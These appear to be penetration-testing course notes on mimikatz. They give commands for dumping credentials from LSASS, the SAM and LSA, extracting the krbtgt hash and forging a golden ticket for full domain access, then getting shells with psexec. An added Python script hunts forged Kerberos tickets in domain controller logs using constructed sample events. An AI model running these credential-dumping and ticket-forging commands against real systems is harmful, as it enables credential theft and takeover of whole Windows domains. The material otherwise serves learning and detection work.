Mimikatz
Once we get Domain Admin we can use mimikatz to dump the creds
Launch mimikatz from the target and run
privilege::debug (will allow us to debug processes):

C:\Users\Administrator\Downloads>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 Aug 10 2021 17:20:39
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz #

Can be useful on a compromised regular computer:
sekurlsa::logonpasswords
We get the NTLM (v1) hash and could try to use pass-the-hash. With WDigest we can see passwords in cleartext (prior to Windows 7); on later versions it is only deactivated, so it is possible to reactivate it with mimikatz and wait for somebody to log on.
Dump the sam
lsadump::sam
or
lsadump::sam /patch
Dump LSA (Local Security Authority)
lsadump::lsa /patch
We get NTLM hashes and try to crack them.
Mimikatz - Golden Ticket Attack
With a Golden ticket we can get access to any resource and system on the domain = complete access to the entire domain
lsadump::lsa /inject /name:krbtgt
Take note of:
Domain SID:
S-1-5-21-1324315119-2624990979-1304259423
NTLM hash of krbtgt:
0afd880b6c9c7207067f0e15dab634a9
Pass the ticket:
kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt
Get a cmd prompt using the session and golden ticket
misc::cmd
We can access anything on the network:
We can then use psexec to get a shell on a machine from the network
We download psexec on our compromised machine
We get the shell
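The forged-ticket flow above is exactly what a blue team hunts for on the domain controllers. As an added example (not part of the original notes), the Python below runs three classic golden-ticket heuristics over a constructed, simplified view of Windows security events 4768 (TGT requested) and 4769 (service ticket requested): a ticket naming an account that does not exist in AD (the page's own /User:AnyDoesNotNeedToExist), a service ticket used by an account/client that was never issued a TGT, and a service ticket used long after the last TGT would have expired. The KerbEvent fields, the 10-hour lifetime, the sample accounts and IPs are all assumptions; marvel.local is the realm used in the notes.

```python
"""Hunting for forged Kerberos tickets in domain controller logs.

Added example, not part of the original notes. The records below are a
constructed, simplified view of Windows security events 4768 (a TGT was
requested) and 4769 (a service ticket was requested); the KerbEvent fields
are assumptions that mirror the events' Account Name / Client Address /
Service Name fields.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class KerbEvent:
    time: datetime
    event_id: int          # 4768 = TGT issued (AS exchange), 4769 = service ticket (TGS exchange)
    account: str           # client name as carried inside the ticket
    client_ip: str
    service: str = ""      # target SPN, only meaningful for 4769


# Assumed maximum TGT lifetime (10 hours is the Windows default policy). A forged
# ticket is not bound by policy, so a TGS request long after any TGT is a signal.
MAX_TGT_LIFETIME = timedelta(hours=10)


def find_suspicious_tgs(events, known_accounts):
    """Return (event, reason) pairs for 4769 events that look forged.

    Heuristics (all assume the feed is collected from every domain controller):
      unknown-account        the ticket names an account that does not exist in AD
      tgs-without-tgt        a service ticket was used, but no DC issued a TGT to
                             that account from that client address
      tgs-after-tgt-lifetime the last TGT seen for that account/client is older
                             than the maximum TGT lifetime
    """
    known = {a.lower() for a in known_accounts}
    last_tgt = {}   # (account, client_ip) -> time of the most recent 4768
    findings = []
    for ev in sorted(events, key=lambda e: e.time):
        key = (ev.account.lower(), ev.client_ip)
        if ev.event_id == 4768:
            last_tgt[key] = ev.time
        elif ev.event_id == 4769:
            if key[0] not in known:
                findings.append((ev, "unknown-account"))
            elif key not in last_tgt:
                findings.append((ev, "tgs-without-tgt"))
            elif ev.time - last_tgt[key] > MAX_TGT_LIFETIME:
                findings.append((ev, "tgs-after-tgt-lifetime"))
    return findings


def finding_summary(events, known_accounts):
    """Compact (account, reason) view of find_suspicious_tgs for alerts and tests."""
    return [(ev.account, reason) for ev, reason in find_suspicious_tgs(events, known_accounts)]


def at(hhmm):
    """Constructed timestamp on a single sample day."""
    return datetime.strptime(f"2024-01-01 {hhmm}", "%Y-%m-%d %H:%M")


# Constructed sample data: the accounts the directory actually contains ...
KNOWN_ACCOUNTS = {"Administrator", "jdoe", "svc_backup", "krbtgt"}

# ... and one morning of constructed DC events for the marvel.local realm.
SAMPLE_EVENTS = [
    KerbEvent(at("01:00"), 4768, "svc_backup", "10.0.0.7"),
    KerbEvent(at("09:55"), 4768, "jdoe", "10.0.0.5"),
    KerbEvent(at("10:00"), 4769, "jdoe", "10.0.0.5", "cifs/fs01.marvel.local"),          # normal
    KerbEvent(at("10:07"), 4769, "AnyDoesNotNeedToExist", "10.0.0.9", "cifs/dc01.marvel.local"),
    KerbEvent(at("10:08"), 4769, "Administrator", "10.0.0.9", "cifs/dc01.marvel.local"),  # no TGT from .9
    KerbEvent(at("13:00"), 4769, "svc_backup", "10.0.0.7", "ldap/dc01.marvel.local"),    # 12 h after its TGT
]

if __name__ == "__main__":
    for ev, reason in find_suspicious_tgs(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{ev.time:%H:%M} {reason:<24} {ev.account} from {ev.client_ip} -> {ev.service}")
```

Treat the output as hunting leads, not verdicts: a TGT renewal is itself a TGS request, so a long-lived legitimate session can trip the lifetime check, and a client whose TGT was issued by a DC you are not collecting from will show up as tgs-without-tgt. The unknown-account hit has no benign explanation and is the one to page on.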
Mimikatz - Resources